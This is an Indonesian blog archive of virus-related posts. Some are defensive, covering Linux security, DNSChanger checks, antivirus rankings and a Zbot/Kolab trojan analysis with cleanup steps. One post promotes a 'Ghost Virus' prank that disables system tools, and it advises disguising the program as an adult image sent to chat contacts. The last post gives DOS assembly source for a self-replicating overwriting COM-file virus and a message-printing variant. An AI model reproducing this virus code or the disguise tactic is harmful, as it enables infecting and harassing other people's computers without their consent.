Tampilkan posting dengan label Virus. Tampilkan semua posting
Tampilkan posting dengan label Virus. Tampilkan semua posting

Sabtu, 09 Juni 2012

Lupakan Virus Pada Linux

Mengapa Linux Lebih Kebal Terhadap Virus, pertanyaan seperti itulah yang kerap kali di tunjukan kepada saya, dan kini saatnya saya menjawab dengan posting yang sederhana ini. Mari kita mulai :)

Lupakan Masalah dengan Virus

ya, kasus seperti ini masih sering kita jumpai pada OS windows. Bahkan, tidak jarang penggunanya harus menginstal ulang. Tapi, linux hampir tidak memiliki virus. Bukan berarti “yah, tidak terlalu sering”. Bukan tidak mungkin linux terserang virus, hanya saja linux membuatnya sangat sulit terjadi, karena beberapa alasan berikut:

1. Sebagian besar oarng menggunakan Windows pada komputer mereka, dan pembajak ingin melakukan sebanyak mungkin kerusakan. Anda mengerti maksud saya ?

2. Linux menerapkan manajemen otorisasi yang pintar. Pada windows, kamu (dan program apapun yang kamu install) biasanya memiliki kuasa untuk berbuat apapun terhadap sistem. Misalnya:
Anda kesal dengan komputer anda yang error, kemudian masuk kedalam folder sistem, dan tanpa dosa anda menghapus apapun yang anda mau. Windows tidak akan komplain, atau melarangnya. Dooorrr, setelah komputer di reboot anda akan dihadapkan dengan masalah :D

Bayangkan jikamu memiliki hak untuk menghapus file – file yang berhubungan dengan sistem, tentu proglam lain pun bisa (menyalahgunakan) untuk melakukan hal serupa.

3. Pada linux hal seperti pada point 2 tidak tidak diijinkan untuk terjadi. Mengapa ? Karena setiap kamu meminta akses tehadap hal yang berkaitan dengan sistem, kamu akan terlebih dahulu ditodong untuk memasukan password admin. Begittu juga dengan virus, mereka tidak bisa seenaknya berkliaran merombak sistem.

4. Linux memiliki lebih banyak mata – mata. Ya, linux 'kan open source jadi lebih banayak yang bisa untuk mengoreksi kesalahan, memberikan pendapat, memodifikasi, sehingga linux menjadi lebih sempurna. Jika kita menemukan bug pada windows, ita hanya bisa duduk manis tanpa bisa berbuat apa – apa :D

mungkin cukup sampai disini posting saya kali ini, kenapa ? Karena ini malam minggu dan para jomblo memiliki acara yang padat :P
Mohon maaf bila posting saya mengenai Mengapa linux lebih aman terhadap virus, lupakan virus pada linux, virus pada linux, tidak bermutu dan membuat anda kesal :(
Dan mohon maaf bila terlalu singkat, kenapa ? Karena besok ada seminar security, jadi harus buru buru tidur terus bangun pagi :(

Jumat, 16 Maret 2012

Cara Mendeteksi Komputer yang Terjangkit Virus DNSChanger


Cara Mendeteksi Komputer yang Terjangkit Virus DNSChanger - Maaf, akhir - akhir ini saya tidak bisa blogging terlalu lama dikarenakan banyak tugas praktek, hari senin depan ujian akhir sekolah, dan tidak lama ujian nasional. Jadi, saya tidak bisa membalas satu persatu komentar yang masuk :(

Kali ini saya dapat ilmu dari newbie-herbet tentang DNSChanger. Jika kamu belum tahu apa itu DNSChanger silahkan baca Disini. siapa yang tidak tahu viru yang lagi tenar ini nah kali ini saya akan memberi tahu cara mendeteksi virus ini pada komputer

Virus DNSChanger menyebar dengan cepat ke jutaan komputer dengan memanfaatkan internet. Berikut tips untuk mengetahui apakah komputer Anda tejangkit virus ini atau tidak.

DNSChanger memang bisa dikategorikan sebagai salah satu virus berbahaya. Dengan memanfaatkan kelengahan pengguna ketika browsing, virus ini sudah hinggap di lebih dari 4 juta komputer di 11 negara.

“Penyebarannya paling besar di Amerika Serikat, kalau di Indonesia tidak banyak, paling sekitar 50 ribu,” jelas Alfons Tanujaya, pakar antivirus dari Vaksincom

Nah, ternyata ada cara yang cukup mudah untuk mengetahui apakah komputer Anda terjangkit DNSChanger atau tidak. Yakni menggunakan situs khusus yang dibuat oleh kelompok kerja DNS Changer. Caranya?

Buka web browser (misalnya Internet Explorer, Firefox, Chrome, atau Safari) kemudian akses salah satu situs di bawah ini.

http://dns-ok.us

http://dns-ok.de

http://dns-ok.ax/index_en.html

http://dns-ok.fi/index_en.html

Apabila hasil test berwarna hijau, maka komputer Anda normal. Namun bila hasilnya berwarna merah, maka setting DNS server dari komputer Anda atau router broadband Anda diarahkan ke server jahat yang dikenal.

Lalu bagaimana jika hasilnya adalah ‘positif’? Komputer atau router yang terjangkit DNSChanger bisa disembuhkan dengan beberapa cara berikut ini:

Komputer
1. Disarankan untuk mengembalikan setting DNS komputer yang terjangkit untuk mendapatkan settingan lama dengan otomatis. Silakan kontak ISP atau admin IT kantor Anda untuk mendapatkan bantuan.

2. Jika komputer terjangkit malware DNSChanger usahakan untuk tidak mengupdate sistem dan database software security.

Untuk membersihkan virus tersebut pengguna Windows dan Mac bisa menggunakan aplikasi antivirus yang paling update, baik versi gratisan ataupun berbayar.

3. Setelah dibersihkan, gunakan lagi metode test di atas untuk meyakinkan apakah setting DNS server sudah normal atau belum.

Broadband Router
Disarankan untuk mengikuti dokumentasi yang disediakan oleh vendor untuk mereset settingan DNS server dan mengubah password default admin.

Ryuz4k1,

Selasa, 13 Desember 2011

Membuat komputer berhantu dengan Ghost Virus

[Image: ghost-in-computer.jpg]

Pernah terpikir tentang komputer hantu? bunyi-bunyi sendiri, keluar layar berwarna hitam, keluar pesan aneh, disk drive terbuka sendiri, dan lain-lain. Bagaimana jika yang jadi korban adalah teman anda, dan yang menyababkanya adalah anda. Tentu sangat menarik bukan? Pada artikel sebelumnya telah saya singgung tentang The Ultimate Virus yang bisa membuat teman anda cemas setengah mati. Sedangkan Program prank kali ini bernama Ghost Virus yang bisa membuat teman anda takut setengah mati.

Berikut akibat yang akan ditimbulkan saat program dijalankan:
1. Mematikan Disk Manager
2. Mematikan Registry Editor
3. Mematikan MS Config
4. Mematikan Command Prompt
5. Mematikan Explorer
6. Mematikan Shutdown
7. Mematikan Task Manager
8. Bunyi beep setiap 100 ms
9. Menampilkan layar hitam setiap 2 detik
10. Menampilkan pesan aneh
11. Restart sendiri
12. Membuka/menutup disk drive setiap 100 ms
13. Menyembunyikan kursor
14. Mematikan Alt+CTRL+Del

Menarik bukan? apalagi jika diaktifkan pada malam hari. Caranya gunakan Schedule Task dari control panel. Buat schedule task baru menuju program ini, kemudian atur jadwalnya pada malam hari. xi..xi..xi

Cara lain dapat anda samarkan programnya dengan icon gambar. Kemudian kirim ke teman chatting kamu malam hari. Katakan kamu ada gambar BB +17 bagus. Doi pasti bisa dikerjain, makan tuh BB!

Silahkan Download disini

Catatan:
- Beberapa anti virus mungkin mendeteksi ini sebagai virus
- Untuk mematikan program tekan tombol "P"

Selamat mengerjai...! gunakan dengan bijak.
Ganteng :f

source: hacker-newbie.org

Senin, 07 November 2011

Antivirus Terbaik Tahun 2012



Antivirus merupakan program yang sangat penting bagi setiap komputer karena program ini lah yang menjaga data-data penting kita dari program-program jahat seperti virus, trojan, worm, dll. Antivirus yang canggih menentukan tingkan keamanan dari data-data yang ada di komputer kita. Berikut daftar antivirus terbaik versi TopTenReviews.com.




Spoiler for ’1. BitDefender Antivirus Plus’:







Features:


• New! Autopilot

• New! Flexible Interface

• New! Vulnerability Scanner

• Antivirus

• Antiphishing

• Antispyware

• Quick Scan

• Search Advisor

• Home Network Management


• New! Social Networking Protection

• Chat Encryption

• New! Personal Data Filter

• New! 24/7 Credit Monitoring

• New! Scan Dispatcher



Price: $29.95



Download BitDefender Antivirus Pro









Spoiler for ’2. Kaspersky Antivirus’:







Features :


• Real-Time Protection against viruses, spyware, trojans, worms, rootkits, botnets and more.

• Small Hourly Signature Updates

• System Watcher proactively detects dangerous activity on your PC

• Vulnerability Detection seeks out compromised programs and recommends patches

• Anti-Phishing protects your digital identity

• Virtual Keyboard provides secure entry of online banking and shopping information

• iChecker/iSwift provide intelligent scanning for maximum performance

• Gamer Mode for an uninterrupted gaming experience

• Free Technical Support (Phone, Live Chat, E-mail, Knowledge Base)


• Works great with Netbooks

• Rescue CD restores your system if maliciously attacked



Price: $59.95



Download Kaspersky Antivirus









Spoiler for ’3. Panda Antivirus Pro’:








Features:

• Antivirus

• Antispyware

• Antiphishing

• Antirootkit

• Antihacking


• Firewall

• Multimedia/Gaming Mode

• Home Network Manager

• Secure Browser

• Automatic Upgrades

• SafeCD



Price: $44.99



Download Panda Antivirus









Spoiler for 4. AVG Antivirus:








Features:

• Surf and search with confidence

• Keep tough threats out

• Stay protected on social networks

• Download, share files and chat safely

• Support and assistance

• Play games and watch movies without interruption

• Scan smarter and faster




Price: $34.99



Donwload AVG Antivirus









Spoiler for 5. F-Secure Antivirus:








Features:

• Easy to install and use

• Real-time blocking of viruses, spyware and other malware

• Instant protection against new threats (DeepGuard in-the-cloud protection)



Price: $39.99




Download F-Secure Antivirus









Spoiler for 6. Avast! Pro Antivirus:








Features:

• Antivirus and anti-spyware engine

• Real-time anti-rootkit protection

• avast! WebRep

• avast! CommunityIQ

• Boot-time scanner

• avast! SafeZone

• AutoSandbox


• avast! Sandbox

• Intelligent Scanner

• Silent/Gaming Mode

• Green computing

• File System Shield

• Mail Shield

• Web Shield

• P2P Shield/IM Shield

• Network Shield


• Script Shield

• Behavior Shield

• 64-bit support

• Heuristics engine

• Code emulator

• Automatic processing

• Smart virus definition updates

• Fast application of updates

• Multi-threaded scanning optimization


• Wake-up/Scheduled scanning

• Command-line scanner



Prize: $39.99



Download Avast Antivirus









Spoiler for 7. BullGuard Antivirus:








Features:

• Antivirus - Give computer viruses like Trojans and worms no chance with catch rates you won’t see anywhere else.

• Safe Browsing - Flags any unsafe websites that come up in search results.

• Spamfilter - Keep your inbox clean from junk mail and phishing attempts.

• Support - Free 24/7 support when you need it.



Price: $29.95




Donwload BullGuard Antivirus









Spoiler for 8. G-Data Antivirus:








Features:

• Best virus detection rates with DoubleScan technology and OutbreakShield

• Extremely fast response time to new viruses

• Most up-to-date recognition methods for unknown viruses (behaviour blocking, heuristics, CloudSecurity)

• NEW! Idle scan: virus checking when the user or system is inactive

• NEW! Proactive protection against online banking Trojans

• Faster system and application starts


• More effective web and phishing protection

• NEW! On-execution monitoring mode specially for heavily-loaded systems



Price: $29.95



Download G-Data Antivirus









Spoiler for 9. Eset NOD32 Antivirus:








Features:

• Keeps you safe from viruses, spyware, trojans, password stealers and other malware threats

• Stops most new threats proactively, well before other vendors have issued a signature, maximizing your defense against new and unknown threats

• Scans and cleans Internet traffic and email, even when it's SSL-encrypted, so your email is always safe

• Stops threats from entering through removable devices so you can share files with confidence

• Integrated SysInspector and SysRescue simplify system diagnosis and recovery


• Self defense prevents malware from degrading your level of protection

• Tiny signature updates happen discretely as needed and won't bog down your system

• Free technical support via the Web, email or phone



Price: $39.99



Downlaod ESET Nod32 Antivirus










Spoiler for 10. Avira Antivir:







Features:

• AntiVir stops all types of viruses

• AntiAd/Spyware eliminates ad/spyware


• AntiPhishing protectsyour data against phishing attacks

• AntiRootkit against hidden malware

• AntiDrive-by prevents against downloading viruses when surfing

• MailGuard scans email traffic (POP3/ SMTP/ IMAP)

• WebGuard protection against malicious websites

• RescueSystem create a bootable rescue CD

• QuickRemoval eliminate viruses at the push of a button

• NetbookSupport for laptops with low resolution

• AHeADTechnology detects even unknown viruses by profiles


• AntiVirProActiv detects unknown viruses by behavior (only for Microsoft Windows XP, Vista, Windows 7 32-Bit systems) NEW!

• GenericRepair automatic repair of your PC NEW!

• ExpressInstallation install Avira in just 5 clicks NEW!

• AviraSupport there for you in person when questions arise



Price: $23.49



Donwload Avira Antivir
















Spoiler for Sumber:






Code:


http://anti-virus-software-review.toptenreviews.com/








Semoga posting ini bisa membantu dalam memilih antivirus yang akan dipakai di tahun 2012.


source: http://www.kaskus.us/...php?t=11340017

Senin, 17 Oktober 2011

5 Jurus Menghindari Virus Chat di Facebook

virus chat fb

Sebelumnya pernah di bahas virus di chat fb kali ini kita bahas jurus untuk menghindarinya

5 jurus untuk menangkalnya ala Vaksin.com



1. Hindari melakukan klik pada link yang dikirim pada Anda, baik melalui pesan chat Facebook atau status.

2. Beritahukan pada teman Anda, bahwa komputer tersebut telah terinfeksi virus, dan segera lakukan update dan scan komputer dengan antivirus yang terupdate.

3. Jangan melakukan copy link atau melakukan pemberitahuan disertai link tersebut, karena dengan begitu Anda justru ikut menyebarkan link yang mengandung virus tersebut.

4. Jangan meninggalkan Facebook Anda dalam keadaan aktif/login, sebaiknya logout dulu hingga Anda kembali.

5. Gunakan Secure HTTP / HTTPS pada saat login Facebook, hal ini agar akun Anda tidak mudah diakses oleh orang lain di sekitar Anda.

Rabu, 05 Oktober 2011

Virus FB Chat, Varian Zbot komputer jadi robot yang bolot

Pernah-kah Anda mendapatkan pesan chat pada Facebook dari salah satu kontak Facebook Anda ? Pesan chat tersebut memberikan sebuah link tertentu. (lihat gambar 1)


Jika Anda meng-klik link pada pesan chat tersebut, maka secara otomatis file virus akan terdownload ke dalam komputer Anda. Dan jika Anda menjalankan file tersebut, maka komputer Anda akan terinfeksi oleh virus tersebut.


Jika anda familiar dengan salah satu varian worm yang menyebar via chat seperti YM (Yahoo! Messenger) atau Skype, maka anda patut waspada, karena VaksinCom telah menerima laporan serangan worm/rootkit/trojan yang menyebar menggunakan pesan chat pada FB. Hebatnya, virus ini tidak memanfaatkan Apps Facebook sehingga administrator Facebook tidak bisa menghentikan virus ini dibandingkan dengan virus Facebook lain yang mengandalkan Apps.


Sejak pertengahan Agustus hingga saat ini banyak pengguna komputer yang sudah terinfeksi oleh serangan worm/rootkit/trojan ini, dan varian tersebut terdeteksi oleh Norman sebagai W32/Kolab.xx. (lihat gambar 2)



Keluarga ZBOT : Broadcast message

Keluarga ZBOT merupakan salah satu kelompok trojan/backdoor yang dirancang untuk mencuri informasi/data dari pengguna komputer terutama hal-hal yang berhubungan dengan data pribadi keuangan khususnya yang berhubungan dengan Internet Banking.


Sedangkan varian worm/rootkit/trojan Kolab merupakan salah satu varian dari ZBOT yang muncul sejak pertengahan Agustus 2011. Varian ini memiliki kemampuan mengirim pesan yang disertai link yang memiliki konten bervirus. Link yang dikirimkan pun bermacam-macam sesuai dengan jenis varian. Trojan Kolab juga diidentifikasikan sebagai W32/Kryptik atau W32/SlenfBot.


Trojan ini memiliki kemiripan (atau mungkin merupakan bagian) dengan kelompok malware YM (ChyMine/YiMfoca, yang identik menyebar menggunakan akun YM, Skype, Gtalk, dan lain-lain) karena memiliki file dan lokasi yang sama persis dengan malware YM.


Gejala & Efek Trojan Kolab

Beberapa gejala yang terjadi jika anda sudah terinfeksi yaitu :


BSOD, menumpang svchost

Trojan Kolab tidak berjalan pada proses atau services Windows, sehingga sulit menemukan dan mematikan keberadaan trojan ini. Tetapi, trojan ini justru mendompleng atau menumpang pada file svchost.exe milik Windows, sehingga Anda akan sulit mematikan-nya. Jika Anda memaksa mematikan file svchost.exe, komputer akan blue screen (lihat gambar 3). Termasuk jika Anda mencoba melakukan scan menggunakan tools removal tertentu seperti GMER (tools mendeteksi rootkit).



Broadcast ke IP-IP tertentu

Walaupun tidak berjalan pada proses atau services Windows, trojan Kolab memanfaatkan file svchost.exe Windows, untuk melakukan broadcast pada IP-IP Address tertentu. Hal ini yang membuat jaringan internet menjadi lambat. (lihat gambar 4)



Mencantumkan diri-nya pada Windows Firewall

Agar dapat berjalan bebas tanpa hambatan dan tidak di blok Firewall, trojan Kolab ikut mencantumkan diri-nya pada Windows Firewall, sehingga dapat melakukan koneksi dan broadcast pada IP-IP tertentu dengan leluasa. (lihat gambar 5)



Menyembunyikan proses berjalan

Hebatnya trojan Kolab, walaupun sedang melakukan broadcast tetapi tidak terlihat dalam proses Windows. Hal ini yang menyebabkan agak sulit untuk dimatikan secara manual. Banyak aplikasi sekuriti yang tidak mampu mendeteksi Kolab seperti :

Windows Task Manager

Process Explorer

Current Process

HijackThis

Dll


Aktif pada Start-Up

Bukan hanya pada Windows Firewall, trojan Kolab juga ikut mencantumkan dirinya pada start-up Windows. Sehingga jika komputer akan dijalankan, maka trojan Kolab akang langsung aktif. (lihat gambar 6)



Menyebarkan pesan chat link bervirus pada Facebook

Ini adalah gejala pamungkas, jika Anda telah terinfeksi oleh Kolab. Komputer Anda akan mengirimkan pesan chat link yang mengandung virus kepada teman-teman Facebook Anda seperti pada gambar 1 di atas atau gambar 7 di bawah ini. (lihat gambar 7).



Beberapa link tersebut umumnya berasal dari website yang memberikan ijin untuk menyimpan atau menyebarkan file secara gratis seperti :

Imageshack.com

Imgdropbox.com

Megafilehd.com

Facebook.com


Mengirim pesan chat link bervirus pada aplikasi web lain yang terhubung dengan Facebook

Salah satu aplikasi web yang terintegrasi dengan Facebook yaitu Skype juga ikut menjadi korban dari serangan trojan Kolab. Umumnya jika Anda menggunakan account Skype yang sama dengan account pada Facebook Anda, maka secara otomatis akan saling terintegrasi. Hal ini yang dimanfaatkan trojan Kolab untuk dapat menyebarkan pesan chat yang mengandung link bervirus. Hal ini juga bisa terjadi jika account Facebook Anda terintegrasi juga dengan account lain yang memiliki fitur chat. (lihat gambar 8)



File Trojan Kolab

Trojan Kolab dibuat menggunakan bahasa pemrograman C++. Varian dari trojan ini sudah sangat banyak dan beragam, serta memiliki ukuran yang berbeda-beda. Berikut ciri-ciri file trojan sebagai berikut : (lihat gambar 9)

Memiliki ukuran beragam dari 150 kb s/d 300 kb

Type file “Application” dan “MS-DOS Application”

Memiliki extension “com” dan “exe”



Saat trojan Kolab berhasil dijalankan, trojan hanya akan membuat 1 file induk yaitu :

C:\WINDOWS\system32\[nama_acak.exe]


Sedangkan file yang didownload melalui link pada pesan chat seperti berikut :

[nama_file.JPG_link_website].com

Keterangan :

Nama_file : nama file acak, identik dengan “Picture”

Link_website : merupakan tempat file tersebut dapat di download, misal www.facebook.com


Modifikasi Registri

Modifikasi registri yang dilakukan oleh trojan Kolab antara lain sebagai berikut :

Menambah Registry

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run

Windows Network = C:\WINDOWS\system32\[nama_acak].exe


Metode Penyebaran

Cara trojan Kolab melakukan penyebaran yaitu sebagai berikut :

Pesan chat melalui account FB atau yang terhubung dengan FB (lihat gambar 10)

Cara satu-satunya trojan Kolab untuk menginfeksi dan melakukan penyebaran melalui media jejaring sosial Facebook melalui fitur chat. Selain itu juga dapat melalui account e-mail Facebook Anda yang digunakan pada aplikasi chat lain yang terhubung dengan Facebook semisal Skype.



Pembersihan trojan Kolab

Putuskan koneksi jaringan/internet.

Lakukan pembersihan trojan pada mode “safe mode”.

Lakukan langkah-langkah berikut :

Restart komputer (jika dalam keadaan mati tinggal tekan tombol power)

Saat akan booting tekan tombol F8 pada keyboard secara secara terus menerus hingga muncul layar “Safe Mode” (lihat gambar 11)




Pilih mode “Safe Mode”, dan klik [Enter]

Biarkan berjalan hingga masuk menu Login Windows.


Matikan dan hapus trojan Kolab

Lakukan langkah-langkah berikut :

Download removal tools (pada komputer yang bersih) untuk membersihkan trojan Kolab pada komputer yang belum terinfeksi pada link berikut :

Norman Malware Cleaner (lihat gambar 12)

http://normanasa.vo.llnwd.net/o29/public/Norman_Malware_Cleaner.exe



  1. Setelah selesai, kompress file tersebut hingga menjadi file zip.
  2. Kopi file tersebut dan letakkan dimana saja pada komputer yang terinfeksi.
  3. Klik kanan file zip tersebut, kemudian klik explore.
  4. Klik 2x file yang sudah di-explore tersebut untuk menjalankan, kemudian klik Run.
  5. Jika sudah muncul jendela konfirmasi persetujuan Norman Malware Cleaner, klik Accept untuk menjalankan.
  6. Pada tab Scan, pastikan dalam mode Quick.
  7. Pada tab Options, pastikan hanya tercentang pilihan berikut :

    • Enable Quarantine
    • Enable Memory Scanning
    • Enable FakeAV Scanning
    • Enable Cleaning
    • Enable Rootkit Cleaning
    • Enable Sandbox
    • Enable detection of potentially unwanted programs
    • Enable multithreading  

      1. Klik Start untuk memulai Scan.
      2. Biarkan hingga proses scan selesai.
      3. Jika meminta untuk restart, lakukan restart komputer.

         ersihkan temporary file dari jejak trojan Kolab.
        Lakukan langkah-langkah berikut :
      4. Klik Menu Start -> Run
      5. Ketik perintah pada kotak open : cleanmgr , kemudian klik OK.
      6. Pada drive system (C) klik OK, biarkan proses scan drive.
      7. Setelah muncul jendela Disk Cleanup, beri tanda file yang akan di hapus (terutama Temporary Files), kemudian klik OK.
      8. Tunggu hingga selesai.
    • Untuk pembersihan yang optimal dan mencegah infeksi ulang, sebaiknya menggunakan antivirus yang ter-update dan mengenali trojan Kolab dengan baik.



Source: vaksin.com

Sabtu, 25 Juni 2011

cara kerja virus

Cara kerja virus pada umumnya adalah menyebarkan dirinya dengan salah satu caranya menginfeksi file - file yang di jalankan. Dan sifat virus jika di jalankan, maka ia akan menulari / mengcopy dirinya ke program yang lain. Agar bisa berkerja sebagai virus, maka ia harus memiliki 5 kemampuan yang harus di miliki. 5 kemampuan itu ialah:


1. kemampuan mendapatkan informasi
kemampuan ini memang penting, terutama mengenai file yang akan di infeksi. Hal-hal yang harus di ketahui antara lain:

1. apa Extensi file tersebut, seperti .exe .com .bat
2. atribut file (hidden, readonly, archive)
3. besar file yang akan di infeksi

Informasi tersebut sangat bermanfaat bagi virus, dimana informasi mengenai Extension file berguna untuk virus yang menyerang file-file tertentu contohnya virus yang menyerang file EXE, virus tersebut harus mencari file-file EXE yang akan ditulari.

Informasi attribut berguna untuk memberikan pilihan pada virus apakah dapat menyerang file dengan attribut Read only, Hidden ataukah virus harus mengeset attribut file-file tersebut menjadi Normal, sehingga virus dapat menulari.

Informasi tentang ukuran file berguna untuk operasi matematis yang akan menghitung berapa besar file yang sudah tertular, dimana

Besar_file_terinfeksi = file_asli + Virus_size

Fungsi ini terutama dipakai oleh virus Non OverWriting. Dibawah ini cuplikan metode virus untuk mendapatkan informasi tentang File :

Start : mov dx,offset File_to_infect ; cari seluruh file

Mov ah,4Eh
Mov cx, 3 ; Attribut File ; cari host file

———

int 21h ; Dos Intrupt
cmp ax,12h ; Ada file lagi

je exit ; kalau tidak ada exit

———

file_to_infect db “*.COM” ; File yang akan diinfeksi
ends start ; Akhir kode Virus

Listing Search First File

Dimana Dx menuju ke alamat yang berisi nama file yang akan di infeksi, sedangkan disini di gunakan DOS Interupt 21H dengan Service ah, 4EH yang berguna untuk mencari file pertama yang cocok dengan DX (Find First Matching File), dan mendapatkan informasi tentang file yang berada di dalam directory, biasanya fungsi 4Eh ini selalu berpasangan dengan 4Fh, yaitu fungsi untuk mencari file berikutnya yang cocok (Find Next Matching File), sedangkan nilai CX,3 digunakan untuk mengecek attribut dari file, apakah Hidden, ReadOnly, virus dapt mengeset kembali attribut file menjadi normal, sehingga virus dapat menginfeksi file tersebut.

2. Kemampuan Untuk Memeriksa Program

Kemampuan untuk memeriksa program sangat penting bagi Virus Komputer, karena untuk mengetahui apakah file target sudah tertular atau belum, ini sangat penting karena virus tidak akan menularkan dirinya berkali-kali pada file yang sama, selain untuk mempercepat proses penularan juga untuk menjaga agar file korban tidak rusak, karena apabila penularan dilakukan berulang-ulang pada file yang sama, CRC dari file tersebut akan kacau dan menyebabkan file yang tertular tidak jalan, biasanya file rusak tersebut akan mengeluarkan pesan Divide Over Flow, atau Error in Exe File, selain itu file yang berkali-kali diinfeksi akan bertambah besar, dan akan mencurigakan pemakai komputer.

Berikut ini contoh listing dari kemampuan untuk memeriksa file

Mov ah, 3fh ; Baca file
Mov cx, 3 ; baca 3 byte
Mov dx,3_byte ; simpan pada buffer
Add dx,si ; Nama file
Int 21h ; Dos intrupt
Cmp a,3 ; Cek 3 byte tadi
Jnz cari_lagi ; Jika sudah tertular exit
Jmp Infect ; kalau belum , infect_file
3_byte equ $ ; data 3 byte pertama dari file asli
yang belum tertular
infect_file : ; bagian penginfeksian

———— ; rutin infeksi

int 20h ; Dos Exit function
nop ; No Operation

Listing Periksa File

Pada rutin diatas dapat dilihat bagaimana Virus Komputer memeriksa file korbannya, untuk memberikan identitas file mana yang sudah terinfeksi maupun yang belum, karena dengan memeriksa file korban, umumnya 3 byte pertama yang menandakan file tersebut sudah tertular / belum, 3 byte pertama tersebut umumnya intruksi JMP : offset (Untuk file COM) , kode ‘MZ’ pada header file EXE dan PE untuk File Aplikasi Windows. Rutin ini sangat penting untuk menghindari penularan berkali-kali pada file korban, juga untuk menpercepat penularan. Rutin ini dipakai oleh 90 % virus komputer untuk menularkan diri.

3. Kemampuan untuk menggandakan diri / Replicating

Kemampuan ini merupakan inti utama dari Virus Komputer, karena virus komputer memang diprogram untuk menularkan, dan memperbanyak dirinya. Tugas dari rutin replicating ini adalah menyebarkan virus keseluruh system yang ditularinya, tugas dari rutin ini sangat berat karena rutin tersebut harus mampu menyebarkan virus dengan cepat dan tidak diketahui oleh pemakai komputer, selain itu rutin replicator harus dapat menjaga agar file yang ditularinnya tidak rusak (Rutin untuk Virus Appending / NonOverwriting), dan dapat berjalan sebagaimana mestinnya.

Cara kerja rutin replicator pada file COM lebih sederhana dari file EXE, karena struktur program EXE yang tidak terbatas besarnya yaitu (sebesar memory di komputer), sedangkan file COM hanya dibatasi sampai 64 Kb (Base memory). Rutin replikator pada file COM akan mendeteksi dan mengcopy byte pertama dari file yang akan ditularinya, kedalam suatu daerah di memory, rutin tersebut dipindahkan kedalam daerah lain dalam file.

Pada diagram diatas P1 adalah bagian pertama dari file, P2 adalah bagian kedua dari file korban. P1 harus sama besar dengan V1 (rutin virus) , rutin virus akan menyimpan P1 dan mengcopynya pada bagian akhir dari file.

Setelah itu virus akan mengcopykan bagian pertama dari dirinya (V1) ke bagian awal file korban. Dimana V1 berisi instruksi JMP:V2, yaitu instruksi untuk memanggil

badan Virus yang ada di belakang file korban.

Kemudian virus akan mengcopykan bagian kedunya (V2) yang merupakan badan virus ke akhir file yang ditulari, V2 ini biasanya berisi rutin-rutin lain seperti rutin untuk pengaman, rutin untuk melakukan aksi tertentu dan lain-lain. Rutin tersebut dapat dilihat dibawah ini :

Dalam program dapat diambil contoh 44-Virus.Com, yang merupakan virus sepanjang 44 byte, dengan cara kerja Overwriting file Com yang ada dalam suatu directory sepanjang badan Virus itu sendiri yaitu 44 Byte, virus ini masih sangat sederhana dan belum mempunyai rutin-rutin pengaman, maupun kemampuan untuk memeriksa program, ataupun rutin untuk aksi-aksi tertentu , dalam contoh dibawah ini virus hanya mempunyai kemampuan untuk menulari file Com.

Namun demikian dapat kita lihat bagaimana virus akan berkembang dengan cara menggandakan dirinya dalam program Com.

Berikut ini listing dari 44-Virus.Asm :

Virus segment org 100h ; file COM

assume cs:virus

len equ offset last-100h ;Panjang virus = Akhir program – awal program
start : mov ah,04eh ; Cari file dengan kategori file COM
xor cx,cx ; cx 0, = hanya file dengan atrribut Normal
lea dx,com_mask ; Nama file COM masukan ke register DX
int 21h ; Dos Interupt
open_file : mov ax,3d02h ; Buka file dengan mode Baca/Tulis
mov dx,9eh
Int 21h
Infect : mov cx,len ; cx diisi panjang badan virus
lea dx,start ; Masukan header Virus “V1″ pada DX
Mov ah,40h ; Tulis badan virus dalam file korban
Int 21h ; Dos Intrupt
Next : mov ah,3eh ; Tutup file korban
int 21h
mov ah,4fh ; Cari file korban lagi
int 21h
jnb open_file ; Apa sudah semua file Com ? kalau belum jmp ke Open_file
; Kalau sudah semua terinfeksi Exit

com_mask: db “*.COM”,0 ; File dengan ekstensi Com

last : db 090h ; Akhir badan virus “V2″

virus ends

end start

Listing Replicating / Penggandaan

4. Kemampuan Mengadakan Manipulasi

Kemampuan untuk mengadakan manipulasi sangat penting dilakukan oleh virus, karena bagian ini sebetulnya yang membuat virus komputer menarik, dan mempunyai seni dalam pembuatannya. Bagian manipulasi atau rutin manipulasi ini banyak macamnya, dan fungsinya, suatu virus dapat mempunyai salah satu diantara rutin-rutin manipulasi ini maupun gabungan antara rutin-rutin manipulasi tersebut. yang pasti, makin banyak rutin manipulasi yang dipakai oleh virus, maka akan makin besar ukuran virus yang dibuat. Diantara rutin-rutin manipulasi yang ada, yang sering digunakan adalah :

1. Menampilkan tulisan / kata-kata / gambar

2. Membunyikan port speaker

3. Time bomb / logic Bomb

Menampilkan Tulisan / gambar

Rutin ini yang paling banyak dipakai oleh pembuat Virus Komputer, karena rutin ini selain untuk kepopularitas virus maupun pembuatnya, juga akan membuat virusnya mudah dikenal oleh para pemakai komputer, selain itu rutin ini membutuhkan suatu kreatifitas tinggi dan jiwa seni dari pembuatnya yang akan membuat virus ini akan menarik. Listing program dibawah ini akan memberikan contoh pembuatan rutin ini.

virus segment org 100h assume cs:virus

len equ offset last-100h ; Panjang virus = Akhir program – awal program

start : jmp mulai

msg db ‘ Modification of 44 Virus ‘,13,10

db ‘ © 2000,iwing[indovirus] ’,13,10

db ‘ – For Educational Only -$’,13,10

mulai : mov ah,09 ; Dos service 09h = Cetak String

lea dx,msg ; dx berisi pesan yang akan dicetak

int 21h ; Dos intrupt

go : mov ah,04eh ; Cari file dengan kategori file COM

xor cx,cx ; cx 0, = hanya file dengan atrribut Normal

lea dx,com_mask ; Nama file COM masukan ke register DX

int 21h ; Dos Intrupt

open_file : mov ax,3d02h ; Buka file dengan mode Baca/Tulis

mov dx,9eh

Int 21h

infect : mov cx,len ; cx diisi panjang badan virus

lea dx,start ; Masukan header Virus “V1″ pada DX

mov ah,40h ; Tulis badan virus dalam file korban

Int 21h ; Dos Intrupt

Next : mov ah,3eh ; Tutup file korban

int 21h

mov ah,4fh ; Cari file korban lagi

int 21h

jnb open_file ; Apa sudah semua file Com ?,kalau belum jmp ke

Open_file
; Kalau sudah semua terinfeksi Exit

com_mask: db “*.COM”,0 ; File dengan ekstensi Com

last : int 20h ; Akhir badan virus “V2″

virus ends

end start

Listing Rutin Cetak String

Pada listing program virus diatas dapat dilihat, modifikasi dari virus 44 byte Dengan tambahan rutin untuk menampilkan string :

Modification of 44 Virus

© 2000,iwing[indovirus]

-For Educational Only –

setiap kali penularan. Disini dapat dilihat rutin yang menampilkan pesan tadi yaitu :

mulai : mov ah,09 ; Dos service 09h = Cetak String

lea dx,msg ; dx berisi pesan yang akan dicetak

